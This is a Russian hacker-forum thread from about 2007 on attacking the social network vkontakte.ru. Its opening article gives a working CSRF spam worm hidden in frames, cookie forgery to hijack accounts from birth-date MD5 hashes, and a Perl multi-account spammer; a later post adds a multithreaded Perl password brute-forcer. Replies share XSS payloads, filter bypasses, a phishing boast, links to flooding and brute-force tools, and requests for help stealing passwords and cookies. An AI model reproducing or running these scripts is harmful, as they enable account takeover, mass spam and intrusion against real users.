Интро

Привет, котятки! Сегодня мы попробуем заняться паразитизмом на довольно крупном сервисе vkontakte.ru. Сервис страдает от огромного количества всевозможных проблем с безопасностью и просто багов.
Рассмотрим пару самых занятных багов, может быть, напишем флудер/спаммер.

1. Занимательный javascript

В связи с тем, что изначально формы отправки сообщений и комментариев были ничем не защищены, то был получен довольно забавный опыт саморассылающегося спама. Это и по сей день остаётся актуальным, ибо часть скриптов по-прежнему не защищена.

Итак, рассмотрим, к примеру, скрипт отправки личных сообщений. Вообще, изначально пользователи взаимодействуют с ним посредством метода POST, но в самом скрипте метод не проверяется (то ли используется суперглобальный массив $_REQUEST, то ли register_globals=on).
Примечание: метод не имеет значения, просто метод GET несколько упрощает скрипт, о методе POST будет сказано ниже.

Чтобы отправить сообщение достаточно перейти по ссылке: http://vkontakte.ru/mail.php?act=sent&to_id=1&title=&message=Hello.
Сообщение будет отправленно в случае наличия куки. Собстсвенно, в этом и состоит идея - написать скрипт, который будет открывать эту ссылку в скрытом фрейме, рассылая наши сообщения.

Создадим три страницы:
1) index.html

<frameset ROWS="100%,0%,0%">
<FRAME NAME="mainfrm" SRC="http://www.183.ru/2/">
<FRAME NAME="preved" SRC="preved.html">
<FRAME NAME="timer" SRC="timer.html">
</frameset>

2) preved.html

<html><head></head><body></body></html>

3) timer.html

<head>
<script>
function timer() {
var msg = new String();
var msg_to ;
do { msg_to=Math.ceil(Math.random()*1000000); } while (msg_to.value>1100000); // генерируем случайный id получателя
msg=urlencode('Превед!'); // наше сообщение 8)
msg+='%0a'+parent.location; // добавим к сообщению ссылку на сайт, на котором мы расположены
// отправим наше сообщение
parent.preved.document.location="http://vkontakte.ru/mail.php?act=sent&to_id="+msg_to+"&title=&message="+msg;
setTimeout("timer()", 1250); // И поставим сами себя на таймер
}
</script>
</head>
<body>

<script>
timer();
</script>
</body>

Таким образом, скрипт во фрейме timer будет постоянно слать сообщения, используя фрейм preved, а фрейм mainfrm служит для отвода глаз.

Что делать, если скрипт поддерживает только метод POST? В этом случае нужно создать форму для отправки данных скрипту на сервере, и написать скрипт для отправки формы, вызывающий метод submit: document.our_form.submit();

Пример сего чуда в действии можно посмотреть тут: http://l-0-v-e.by.ru
Когда я опробовал это в действии, счётчик на странице насчитал 17400 человек, сходивших по ссылке. Не очень много, но всё же.
Сие милое развлечение было окрещено пользователями "вирусом".
"Какая же от этого практическая польза?" - спросите вы. Понавешайте на страницу илитных зиродей сплоетов, троянящих каждого зашедшего, и польза будет 8)

2. Проблемы с безопасностью

В куке не проверяется e-mail. Единственное условие - переменная remixemail должна быть непустой. Что, собственно, это нам даёт? Рассмотрим пример: посмотрим, скажем, на пользователя http://vkontakte.ru/profile.php?id=196. Замечательный пользователь. Взглянем на дату рождения - 05.01.1984. Захешируем стоку "05011984" алгоритмом md5, получим a99fa18a6d54dfda21c15fa3f5fe2aac. Составим куку вручную:

remixmid=196; remixemail=bill_gates%40microsoft.com; remixpassword=a99fa18a6d54dfda21c15fa3f5fe2aac;

Откроем страницу vkontakte.ru и - оп! - мы пользователь с id=196. Не хватает только адреса почты. Раньше его можно было посмотреть на странице настроек, но теперь это дело прикрыли. Тем не менее, если он нужен, то его можно получить при попытке смены почты - на оба ящика придёт письмо с указанием обоих адресов. Не красиво, ибо жертва его тоже получит, но если пароль подойдёт к мыльнику - можно будет его удалить.

3. Многопоточный флудер

Ну и коль мы нахекали целую гору аккаунтов, отчего б не написать спаммер заметок.
How to use: аккаунты в accs.txt, прокси в proxies.txt. Для отправки каждого сообщения fork-ом создаётся потомок нашего процесса, если он живёт слишком долго - убивается. Под разными системами по-разному, на некоторых после завершения родительского процесса могут оставаться детишки-зомби 8)

#!/usr/bin/perl

#
# By lord_of_keyboard, 2007.
#

use IO::Socket;
use Digest::MD5 qw (md5_hex);

sub add_child {
my $proxy=shift;
my $acc=shift;
my $pid = fork();
if ($pid) { # parent
push(@children, $pid.":".time());
} elsif ($pid == 0) { # child
$proxy=~s/[\r\n ]//g; $acc=~s/[\r\n ]//g;
my ($host, $port) = split(":",$proxy);
my ($id, $password, $shit) = split(":", $acc);
my $cookie="remixmid=$id; remixemail=bill_gates%40microsoft.com; remixpass=".md5_hex($password);
my $post_id=int(rand(400000));
my $text = "Я тебя люблю ";

for $i (1..int(rand(10)+1)){ $text.=")"; }
$text.="\n http://l-0-v-e.by.ru/";
$text =~s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;

my $get = "GET http://vkontakte.ru/notes.php?act=s&nid=$post_id HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Referer: http://vkontakte.ru/\r\n".
"User-Agent: Internet Explorer 6.0\r\n".
"Cookie: $cookie\r\n".
"Connection: close\r\n\r\n";

my $sock = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
print $sock $get;
while ($html = <$sock>){
if ($html =~ /name="blog_id"/gi){
$html=~m/(\d+)/gi;
$blog_id = $1;
}
}
close $sock;
sleep(1);

$request = "blog_id=$blog_id&post_id=$post_id&act=addComment&comment=$text";
$comment = "POST http://vkontakte.ru/notes.php HTTP/1.1\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".length($request)."\r\n".
"Referer: http://vkontakte.ru/\r\n".
"User-Agent: Internet Explorer 6.0\r\n".
"Cookie: $cookie\r\n".
"Connection: close\r\n\r\n$request";
my $sock = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);

print $sock $comment;
while (<$sock>){ print; }
close $sock;

exit(0); # bailing out 8)
} else {
die "couldn't fork: $!\n";
}
}

sub next_plz {
$proxy_offset++; $acc_offset++;
if ($proxy_offset>$#{@proxies}){ $proxy_offset=0; }
if ($acc_offset>$#{@accs}){ $acc_offset=0; }
}

print "Hello, master. I am ready to serve you.\n\n";

open(FILE,"<proxies.txt"); @proxies=<FILE>; close FILE;
open(FILE,"<accs.txt"); @accs=<FILE>; close FILE;

@children=(); $acc_offset=0; $proxy_offset=0;
for my $i (1..10) { add_child(@proxies[$proxy_offset], @accs[$acc_offset]); next_plz; }

while (1){
print "There are ".(@children)." of us.\n";
for my $i (0..$#{@children}) {
my $child=@children[$i];
my ($pid,$time)=split(":",$child);
my $status = waitpid($pid, -1);
if ($status>=0) {
if (time()-$time>30) {
kill($pid); # time has come to die, r.i.p.
} # if
} else {
splice(@children,$i,1);
add_child(@proxies[$proxy_offset], @accs[$acc_offset]); next_plz;
}
} # foreach
sleep(2);
}

Заключение

Всё написанное выше - не более, чем описание некоторого опыта. Может кому-то пригодится, может, возможно использовать где-то ещё.
By C!klodoL & lord_of_keyboard, 2007.

А что это за проект такой, что "некоторые" баги на нем тянут аж на целую статью?

нугде то была тема что вконтакте спонсирует ФСБ )

нугде то была тема что вконтакте спонсирует ФСБ )
:eek:

Взглянем на дату рождения - 05.01.1984. Захешируем стоку "05011984" алгоритмом md5, получим a99fa18a6d54dfda21c15fa3f5fe2aac. Составим куку вручную:

remixmid=196; remixemail=bill_gates%40microsoft.com; remixpassword=a99fa18a6d54dfda21c15fa3f5fe2aac;



хм... всегда казалось было что в Мд5 идёт пароль пользователя а не дата рождения.... и в кукисах пароль висит...

хм... всегда казалось было что в Мд5 идёт пароль пользователя а не дата рождения.... и в кукисах пароль висит...
смысл в том что многие юзеры используют в качестве пароля дату рождения или другой легко запоминающийся пароль, в кукисах висит мд5 хэш пароля

/me не увидел ни одного бага в статье

1) спамер
2) тупость юзеров
3) флудер

аргументирую - уже пол года вижу различные флудеры и спамеры для этого сервиса - со всеми вытикающими - я уже молчу об остальных багах на нем

аргументирую - уже пол года вижу различные флудеры и спамеры для этого сервиса - со всеми вытикающими - я уже молчу об остальных багах на нем
дай ссылку на парочку разных
и баги опиши, можно в пм

Не-е-е-ет, то что в куке мыло проверяется кука - это ни разу не баг. И то, что ты не зная мыла можешь залогиниться - это тоже. Ага.
Ну как бы я тут как таковых вообще ни одного "бага" не увидел=\

если бы не заключение, то был бы смысл критиковать

Слушай, ну если ты не знаешь пароль хрен ты залогинишься, а e-mail не нужен это баг, однако сам по себе он ничего не даёт... Но знать не помешает.
Вообще - интересно есть ли на вконтакте что-нить серьёзное, насколько я знаю в паблике ничего нет... Было бы интересно узнать, как никак 4 по посещаемости сайт рунета
P.S. Сам тестил ничего не нашёл, но я слабоват в поиске багов)))

Хы статья крайне бесполезная и багов там действительно нет.
В любом случае, в контакте не такой уж и прокачанный проект. вот если бы всплыли уязвимости на материнском проекте, тогда другое дело

нугде то была тема что вконтакте спонсирует ФСБ )
Если это правда, то vkontakte - большой honeypot, только не для глупых червей и вирей, а для обычных хакеров. Смастырили сайтец, сидят, читают логи, а тех, кто на него без прокси заходил берут на заметку...
Не знаю на счёт контакта, но то, что ресурсы такой направленности действительно существуют - я уверен...

Автор сайта -
Павел Дуров известен в рунете как создатель самого крупного студенческого форума и других околостуденческих проектов. Закончил Санкт-Петербургский государственный университет в мае 2006 года. Лауреат стипендии Президента РФ, лауреат стипендии Правительства РФ, троекратный лауреат стипендии Владимира Потанина, победитель олимпиад по лингвистике, информатике и дизайну. С осени 2006 года большую часть времени отдаёт ВКонтакте.ру - Национальному Каталогу Студентов, работа над которым не прекращается ни на один день.
Занимается программированием с 11 лет.
от себя добавлю что он на чемпе мира по программированию занял толи 2ое толи2ое место.. вот и решайте где там могут быть баги )

Автор сайта -

от себя добавлю что он на чемпе мира по программированию занял толи 2ое толи2ое место.. вот и решайте где там могут быть баги )
Надеюсь сайт СПбГУ не он поднимал =\
https://forum.antichat.ru/showpost.php?p=365054&postcount=2252

Павел Дуров - вообще филолог по образованию. Его брат - да, занимал, но он не принимал непосредственного участия в разработке.
И багов там было навалом. Самые критические просто в самом начале прикрыли.

http://img73.imageshack.us/img73/8652/8989798779ux7.jpg

Автор сайта -

от себя добавлю что он на чемпе мира по программированию занял толи 2ое толи2ое место.. вот и решайте где там могут быть баги )


Ага, а то что проект полностью содан вот отсюда это как?
http://www.facebook.com

Однако все лавры Павлику достались

Кстати на cnews.ru была новость

"Исходный код главной страницы сайта обмена фотографиями Facebook был опубликован неизвестным в блоге Facebook Secrets, сообщил Techcrunch.

Предполагалось, что код был получен либо при помощи эксплуатации уязвимости в движке сайта, либо это была утечка со стороны одного из разработчиков. Но представитель Facebook Брэнди Баркер (Brandee Barker) пояснил, что код оказался доступен небольшому числу пользователей в результате ошибки настройки сервера, которая была очень быстро устранена. Сервер работал таким образом, что php-код не выполнялся, а отображался как текст. Ни хакеры, ни инсайдеры не имеют к этому отношение.

Инцидент может навредить ресурсу: во-первых, код могут использовать хакеры для поиска уязвимостей, во-вторых, код могут использовать конкуренты, чтобы узнать больше о том, как работает Facebook."

Может Павлик даже больше чем просто программист=)

так как народ стучит в аську и спрашивает почему не работает скрипт, выкладываю исправленную версию, так как баг с куками прикрыли теперь нужно знать мыло
#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

##########################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
##########################################
$dic = 'pass.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
##########################################

open (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
my (@mas);
while (<pass>){
push @mas, $_;
last if (@mas > 500);
}
chomp @mas;
return @mas;
}

Может Павлик даже больше чем просто программист=)
сегодня заметил что у павлика миранда даже ip не скрывает 8)

Можно украсть cookies пользователя и поставить их на свою машину, как это сделано на примере mail.ru. Только как их тиснуть?

кто поднаторел в этом деле может мне помоч, надо узнать пас чела там

Интересно, а узнать мыло можно? Не прибегая к соц. инженерии... :rolleyes:

Нашел пару ошибок:
http://vkontakte.ru/invite.php?m=1&email[]=&first_name[]=&last_name[]=
Параметр "m" можно указать самому
http://vkontakte.ru/invite.php?m=2&email[]=&first_name[]=&last_name[]=
http://vkontakte.ru/invite.php?m=3&email[]=&first_name[]=&last_name[]=
http://vkontakte.ru/invite.php?m=4&email[]=&first_name[]=&last_name[]=

+ при ретриве пасса на мыло можно указать что угодно,и будет показано сообщение об успешной отправке )

В принципе ничего серьезного,так мелочи

Xss бы.., эх..

Нашел пару ошибок:
http://vkontakte.ru/invite.php?m=1&email[]=&first_name[]=&last_name[]=
Параметр "m" можно указать самому
http://vkontakte.ru/invite.php?m=2&email[]=&first_name[]=&last_name[]=
http://vkontakte.ru/invite.php?m=3&email[]=&first_name[]=&last_name[]=
http://vkontakte.ru/invite.php?m=4&email[]=&first_name[]=&last_name[]=

+ при ретриве пасса на мыло можно указать что угодно,и будет показано сообщение об успешной отправке )

В принципе ничего серьезного,так мелочи

А по подробнее, плиз... реально интересно... ;)

а никто не задумывался как смотреть закрытые альбомы?
ведь если просто так жипегу он показывает значит ничего такого сильно сложного тама нет... вопрос только как к самой пикче подобраться

Там есть группа <script language="JavaScript">alert("xak")</script>. Они этот вопрос поднимали уже. Поищи в обсуждениях

а никто не задумывался как смотреть закрытые альбомы?
ведь если просто так жипегу он показывает значит ничего такого сильно сложного тама нет... вопрос только как к самой пикче подобраться
раньше можно было смотреть просто изменив ссылку, сейчас по моему уже нет

раньше можно было смотреть просто изменив ссылку, сейчас по моему уже нет

не совсем так
можно было смотреть альбомы у закрытых анкет, т.е. если анкета закрыта для все кроме какой то группы то альбомы этой анкеты увидеть можно было, но недавно прикрыли и это...
однако если в превьюхе закрытого альбома есть пикча, то можно эту картинку увидеть в нормальном размере, достаточно изменить в названии картинки m на x, но тут возникает вопрос как смотреть дальше то... ибо имена картинок идут непонятно как... сдается мне что используется в именовании чтото типа хэширования или чего то подобного.. но вот как это для того чтобы раскрутить всю цепочку... это вопрос...

http://vkontakte.ru/profile.php Заходим в свой профиль и пишем у себя на стене !test =)

http://vkontakte.ru/profile.php Заходим в свой профиль и пишем у себя на стене !test =)
nice :] alert forever :)

http://vkontakte.ru/profile.php Заходим в свой профиль и пишем у себя на стене !test =)
Кстати это прокатывает и на стенах других пользователей.

ну вообще, как я понял катит всё что начинается с ! , а вот что с этим дальше сделать...

есть xss активная в друзьях- http://vkontakte.ru/friend.php в быстром поиске.

есть xss активная в друзьях- http://vkontakte.ru/friend.php в быстром поиске.
боян, всё равно там она никуда не передаётся

вообще там очень интересная фильтрация
1)если написать в тексте на стене && (или ++), причём даже если не подряд, то после второго символа &(+), все удалится вместе с ним
2)потом бывает фигня что когда запишешь что-то типа &!&!&! то выводится сообщение:"Ваше сообщение добавлено", которое закрывает всю стену, после обновления этого сообщения вообще нет, но это бывает не всегда
3)если написать javascript то фильтр изменит это на javas?1?ript
4)если шифровать javascript в url системе то выведется %6Aavascript
5)если написать только // то оно не выводится, хотя пишут, что сообщение отправлено, наверно это связано с автоопределением ссылки
вот так вот, так что они там нехилую фильтрацию поставили=)

Фигня, все эти фильтры так или иначе обходятся.

4)если шифровать javascript в url системе то выведется %6Aavascript
мона просто сделать hekscript:alert(/xss/) тока вот это тока в ие будет работать)

PS странно, в фф тож сработало)

При регистрации никаких каптч нету. Только активацию по почте надо совершить. Возможен ли бот, который будет делать ето все автоматом?

Возможно. Только почты как регать? 8)

раньше можно было сменить мыло на mailinator.com и потом на оригинальное мыло снова регать, теперь уже тему прикрыли

боян, всё равно там она никуда не передаётся
Хм...Ды классная xss попробовал, там и мой емейл и пароль в мд5...Разве нельзя к этому
<input class="inputText" type="text" onKeyUp="friendsLookup(this, event);" style="">
обратиться с помощью js по id объекта?

Возможно. Только почты как регать? 8)

Очень просто - надо взять какой-нить свой домен, на который и слать всю почту (т.е. регать акки на мыла aaa@domen.com, bbb@domen.com, xxx@domen.com), а в настройках хостинга сказать, чтоб вся почта на эти ящики перенаправлялась на основное мыло за которым и следит бот. ;)

AFoST ну так попробуй вставь, расскажешь получится ли)

in_colour не получится, там можно регатся только с разрешенх мыл, с мыл которые там не разрешены не зарегаешься

C!klodoL, такой с подъ&&ом ответ :) Ну пока не получается, сли че, ясен фиг выложу...

AFoST раньше там можно было при смене адреса почты любое указать. Но сейчас наверное нет. Если есть желаение - можешь проверить.

Так и не обратился я к этому элементу...input находится в теге <div> и ни то ни другое имеет id/name...Короче, сдаюсь, моих знаний не хватает :( Да и даже если нему обратиться, то нельзя никак использовать. Не получится сформировать такой удалённый запрос, который бы в поле text вписал бы xss... :(

потребовалось куча акков в контакте, начал писать, понял что довольнотаки геморно. актуальна ли сейчас эта тема?

какойто глюк, половина текста тавось ((, писалось следующие

т.к. потребовалось куча акков, пишу скрипт по регистрации (плюс регистрация мыл 8) ), для контакта. все в финальной стадии. актуален ли будет данный скрипт(коммерческое использование) ??

Собственно регистрации акков вконтакте - нет.
Регистрация мыл - интереснее. Смотря какой мыльник/есть ли каптча, etc.

регистрация мыл на одном из популярных мыльных сервисов рунета

спс второе кое как получилось ^^

регистрация мыл на одном из популярных мыльных сервисов рунета
Как-то уж очень неопределённо 8)

А я так акаунты уганяю: сделал сайт(vkontakte.W6.Ru) и подсовываю эту ссылку ламеру:) говорю што это типа вконтакте 6 он вводит туда свои данные и они отправлятся на форму mail.Php пароль люська

слишком палевно

А я так акаунты уганяю: сделал сайт(vkontakte.W6.Ru) и подсовываю эту ссылку ламеру:) говорю што это типа вконтакте 6 ...
омг, это должно быть ребенок лет семи

Да уж 8)
"Ошибка! Эта ошибка будет скоро устранена приходите позже! Спасибо! Администрация, Павел Дуров."

Плакал 8)

brasco2k
а внизу написано:
Free hosting PHP & MySQL - Ayola.net у Дурова уже денег на нормальный хост не хватает!

brasco2k
а внизу написано:
Free hosting PHP & MySQL - Ayola.net у Дурова уже денег на нормальный хост не хватает!
Многие ломаки на это внимание не обращают :)
И вапще это может быть реклама!

уже две неделе кручусь в контакте, ни одной лазейки. Все что удалось найти, дык это пару триков. Да и заметил что юзается не одна база, а как минимум четыре, между которыми в определенные промежутки происходит синхронизация. никаких xss, я покрайней мере не нашел.

если страницу быстро обновлять, вместо вконтакте будет написанно студенты =) но это фигня)))

понимаю, что сейчас,наверно,тупость сморожу: но на стене неотображаются ссылки (на многих страницах) пишет, что сообщение отправлено, а на стене его не появляется.. Это можно использовать для пассивных Xxs ?

нет, это простая фильтрация

никто не знает,как можно узнать пароль юзера вконтакте!?или это не возможно!?

Узнаёшь мыло -> Ломаешь его -> Восстановление пароля

достать бы базу мыл вконтакте, нехилая такая вещица )

! Очень нужна помощь.
Есть логин человека в контакте(его ящик), и есть Брутус...
подскажите поста как ужнать пареметр timeout. потомучто брутус пишет тайм аут/но респонс(((

! Очень нужна помощь.
подскажите поста как ужнать пареметр timeout. потомучто брутус пишет тайм аут/но респонс(((

Параметр timeout тут не причем) У тебя не пингуется сайт просто...

Эта спамилка контакта ещё работает?

[Инструкция] Качаем музыку и видео с vKontakte

Итак, немного предистории. Бороздя просторы всеми любимого вконтакта, я очень часто находил замечательные музыкальные треки и видеоролики. И я заметил к ним 2 вида комментариев:

1. "какой офигительный клип/трек"
2. "киньте плиз на мыло/дайте ссылку/где скачать?"
Первое время меня улыбали эти фразы и я качал, а затем выкладывал этот файл на хостинг (http://webfile.ru)
Но потом моя щедрая душа решила поделиться со всеми одним не сложным способом выкачивания аудио/видео файлов из вконтакта.
Покончим с сложными словами и перейдем к делу)

*******************************************

Итак, для того чтобы качать видео/аудио из вконтакта вам потребуется:

1. Браузер Mozilla Firefox (http://www.mozilla-europe.org/ru/products/firefox/)
2. Плагин к браузеру Mozilla Firefox под названием Video DownloadHelper (http://addons.mozilla.org/ru/firefox/addon/3006)
3. Прямые руки и капелька мозга

********************************************

Теперь сам процесс установки всей этой хренотени:

1. Устанавливаем браузер.
Ну думаю с этим сложностей ни у кого не возникнет. Для тех кто в танке:
а) Заходим по ссылке http://www.mozilla-europe.org/ru/products/firefox/ и нажимаете на кнопочку с надписью "Скачайте его сейчас - абсолютно бесплатно" - начинается закачка
б) Заходите в папку, в которую вы его скачали, кликаете 2 раза по инсталятору и следуете подсказкам (Как обычно - "Далее => далее => ок")))))

2. Запускаем установленный вами браузер и устанавливаем плагин.
а) Заходим по ссылке http://addons.mozilla.org/ru/firefox/addon/3006 и пролистываем все английские буквы до русского слова "Установить"
б) кликаете по этому волшебному слову "Установить". У вас должно выскочить окошко с заголовком "Установка программного обеспечения"
в) нажимаете "Установить сейчас". Вылезает другое окошко, которое показывает процесс установки.
г) ждем пока в правом нижнем уголке выскочившего окошка загорится надпись "Перезапустить Firefox" - клик по нему и браузер перезапущен с установленным плагином.


Итак, плагин установлен успешно и справа от адресной строки в вашем браузере теперь красуется фигурка из трех кружочков)))

*******************************************

Теперь вам нужно научиться правильно качать файлы с помощью плагина. Опять же объяснение для тех кто в танке на примере веселенького видео со светофорчиками(http://vkontakte.ru/video4312300):

1. Заходим по ссылке с видеофайлом - http://vkontakte.ru/video4312300
2. Видео необходимо просмотреть до конца - загорается и начинает крутиться фигурка справа от адресной строки
3. Нажимаете на черную стрелочку правее крутящейся фигурки и выскакивает страшное название файла из кучи букв с непонятным расширением
4. Нажимаете на это название и у вас открывается окно сохранения файла.
5. В графе "Имя файла" пишите название для файла и обязательно (!!!) ставите расширение(т.е. приписываете после названия) .flv
6. Далее жмете сохранить и видео сохранено у вас в папке по умолчанию C:\Documents and Settings\"Тут_имя_вашего_пользовател� �"\dwhelper

Файлы с расширением .flv должны проигрываться многими медиаплеерами, если они, конечно, у вас не древних версий)))

Теперь некоторые уточнения:
1. К файлам, скачиваемым из раздела "Аудиозаписи" нужно приписывать не .flv а .mp3
2. Музыка, которая закачана вконтакт в виде видеозаписи не сохранится в формате .mp3 - сохраняйте в .flv

Качайте на здоровье:)

юзаю давно :)

Это баг штоле?
Интрукция для ламеров.

Это баг штоле?
Интрукция для ламеров.
очень полезно кстати. так можно порнушку с ютуби выковыривать. вот вам хек для оперы:
C:\Documents and Settings\admin\Application Data\Opera\Opera\profile\cache4\ и поиск

нет это всё понятно, как взять видео, просто их кэша...
А вот объясните как его скачать, то бишь напрямую получить доступ к подключаемому flv файлу, то есть по какому принципу они грузятся, сам пытался расковырять плеер, но во-первых я не знаю action script, а во-вторых не получилось)
Ценность наверно нулевая, но чисто спортивный интерес...

а action script нафиг не нужен, да и знание флеша, поставь себе сниффер, запусти его, открой видюху, посмотри ее. Ну а дальше по логам сниффера не проблема разобраться в том как плеер общается с сайтом ;-)

народ, не кто не писал скрипт рассылки "приглашения дружить", а то чет не получается ни как вобще. приглашения в группы, сообщения на стенку, сообщения в пм шлются, а вот с приглашениями ни как ((

А если написать
!Любое_слово
то вылетит алерт с этим словом

алерт тока для тебя выскочит и все

Заметил такую вещь.
Когда создаем личное сообщение, пишем для начала любые слова "куаук3" например.
Потом нажимаем на кнопку отправить...и скрипт кнопки переноситя в тест
Кнопка "отправить"

javascript:this.disabled=true; document.getElementById('postMessage').submit();
Кнопка "отменить"
javascript:history.go(-1)
Это естественно не уязвимость, но куски кода вырывать таким образом, думаю, не есть гуд.

Заметил вот что, когда приходит личка, то при просмотре входящих показывается начало письма, дак вот иногда в заголовке рвутся спец символ. Покажу на примере, а то мудрено написал.

Исходное сообщение:
--> Привет друг! Читал книгу "Житность Ленина..."?

При пред просмотре будет это выглядеть так:
--> Привет друг! Читал книгу &qu

т.е. в данном примере неправильно обрабатывается &quot;

Заметил вот что, когда приходит личка, то при просмотре входящих показывается начало письма, дак вот иногда в заголовке рвутся спец символ. Покажу на примере, а то мудрено написал.

Исходное сообщение:
--> Привет друг! Читал книгу "Житность Ленина..."?

При пред просмотре будет это выглядеть так:
--> Привет друг! Читал книгу &qu

т.е. в данном примере неправильно обрабатывается &quot;
Это не уязвимость. Просто сначала делается htmlentities($str) а потом substr($str,0,28)

дык я и не говорю что это уязвимость ;)

Насчет скачивания видео и аудио уже давно качаю через кэш Firefox. там сразу видно когда файл подгружается (бежит полоска на странице) в кэше сразу же появляется файл размером условно 0 кб. Затем когда файл подгружается до конца, то файл становится большего размера. ну и далее его надо просто скопировать себе куда-нибудь и затем просто добавить разрешение, если видео то flv, если аудио то mp3 и ненужны никакие отдельные скачиватели

не баг а типа прикола в Семейное положение можно подредактировав хтмл код добавить себя и сделать себя женатым на себе или типа такого =)

не баг а типа прикола в Семейное положение можно подредактировав хтмл код добавить себя и сделать себя женатым на себе или типа такого =)
И как же ты собрался код редактировать?

Люди подкинте флудер какой-нить хороший!!!
стены там или ЛС плиз очень надо

А если написать
!Любое_слово
то вылетит алерт с этим словом

Баян 8)

Это естественно не уязвимость, но куски кода вырывать таким образом, думаю, не есть гуд.

Да не, нормально. Красивее, конечно, прописать это всё к ссылке в обработчик OnClick, но и так вполне себе ничего.

контакт это зло - я оттуда анкету удалил и не жалею=)много времени отнимал сайт. Я тут видел сообщение - чтото вроде - можно какимто обрахом увидеть зашифрованный пароль юзера(в Md5 кажется) - если это так ,то его и расшифровать можно? Или если так можно делать то все бы уже давно так делали?=)

Эх ты,прочитай про md5.Его невозможно дешифровать,его можно лишь грамотно подобрать!;)И то,с умом=)Вытащи все хешт с контакта,а я тебе помогу подобрать!Ну не все конечно....=)

Ну да пароль юзера можно увидеть, своего юзера, у себя в куках...

2Ser_UFL
потредактируй хтмл код в опере и добавь в список себя и все.

Ну да пароль юзера можно увидеть, своего юзера, у себя в куках...
А потом долго расшифровывать свой пароль =)

На счет фильтрации.. если например написать в личном инфо допустем в музыке нечто такое "away.php?to+" мжно хотя все что угодно, главное что присутвовал фильтрующийся символ, при переходе по ссылке плюс как писалось выше фильтруется, но если повториь поиск еще раз кликнув по ссылке , то запись без плюса добавиться тебе после away.php?to+, появится еще away.php?to.
к стати если ктото щелкнет на твое страничке по ссылке и проделает все тоже самое то у него тоже запишется эта запись..

этакое пасхальное яичко, меня когда обнаружил улыбнуло :D

ах да начиналось все с того что я написал следующее: Внимание: мы удаляем пользователей+, так вот припоиске выдало ето Внимание: РјС‹ удаляем пользователе� �№
еще раз нажал на ссылку Р’РЅРёРС�ание: Р С�С‹ удаляеРС� пользователей
еще раз ткнул по ссылке
: Р’РЅРСвЂ�Р С�анРСвЂ�Р В Р’Вµ: Р В РЎпїЅР РЋРІР‚в„– СѓРТвЂ�аляе� пользователРВ еще раз выдало ето Вн��ан�е: Р В РЎпїЅР РЋРІР‚в„– СѓРТ�Р В°РР
еще раз вот ето Р’РЅРСвЂ�Р С�анРВ ... видимо в базе данных у них одна кодировка а у меня в браузере другая, но среагировал он так из за двоеточия поробуйте может у вас по другому :) естесна все ето записалось ко мне в информацию :)

А можно как нить посмотреть кто просматривает твою страницу?

на любой фотке отмечаем человека, вместо ника вписываем код(javascript или vbscript) или в группе вписываем должность руководителя группы. работает тег img. но все это оптимизировать у меня не получилось и врядли получится, так что работает только у того кто вводит данные.

2 freddi сорри, это ответ был на какой вопрос, на пост номер 95?
а какой конкретно код надо вводить вместо ника?

нет, это самостоятельный пост.
код:
<IMG SRC="javascript:alert()"
<IMG SRC='vbscript:msgbox("123")'>

походу, над этим проектом уже поглумились. ща зарегица хотел - смарите что пишут когда выбираеш где учился...

на любой фотке отмечаем человека, вместо ника вписываем код(javascript или vbscript) или в группе вписываем должность руководителя группы. работает тег img. но все это оптимизировать у меня не получилось и врядли получится, так что работает только у того кто вводит данные.

Клёво!
фигова тока, что не воспользоваться для угона куков..

Маленькое наблюдение:
открыв исходник страницы видно такой код:

<div id="pageHeader">

<h1 id="home"><a href="index.php">Студенты</a></h1>

<div id="quickSearch">


Ток сёравно не понимаю причём тут студенты =)

Статья отличная, интересно было прочесть. Есть ли тут практики? Или, так сказать, теоретический разбор полета?

Ничего из представленного ниже я не тестировал и даже не запускал, нашел на винте (датировано сентябрем), прошу тестировать и отписать результат самостоятельно, возможно не работает из-за смены авторизации и тд тп

Брутфорс vkontakte.ru
перловый, я не пробывал, перед запуском не забывайте поставить перл
http://rapidshare.com/files/85782131/vkontakte_brute.rar.html
пароль на архив: http://www.exploit.in

Флудер стены группы vkontakte.ru
все аналогично
http://rapidshare.com/files/85783392/vkontakte_fluder_steni_gruppi.rar.html
пароль на архив: http://www.exploit.in

Флудер личных сообщений юзеров vkontakte.ru
все аналогично
http://rapidshare.com/files/85784026/vkontakte_fluder_lichnih_soobsheniy.rar.html
пароль на архив: http://www.exploit.in

Спамер к комментам к фотоальбомам (нужно вписать свои куки) и Спамер заметок vkontakte.ru
http://rapidshare.com/files/85784990/vk.rar.html
пароль на архив: http://www.exploit.in

Статья отличная, интересно было прочесть. Есть ли тут практики? Или, так сказать, теоретический разбор полета?

Ну, коль уж я это всё написал, то некоторая практика есть, да. 8)
Но сейчас всё перечисленное не работает. Ну, разве что, может быть, кроме флудера.

xss что freddi нашёл

в группе вписываем должность руководителя группы.
<IMG SRC="javascript:alert()"
<IMG SRC='vbscript:msgbox("123")'>


может кто-нить знает, как использовать это чтоб куки унать...

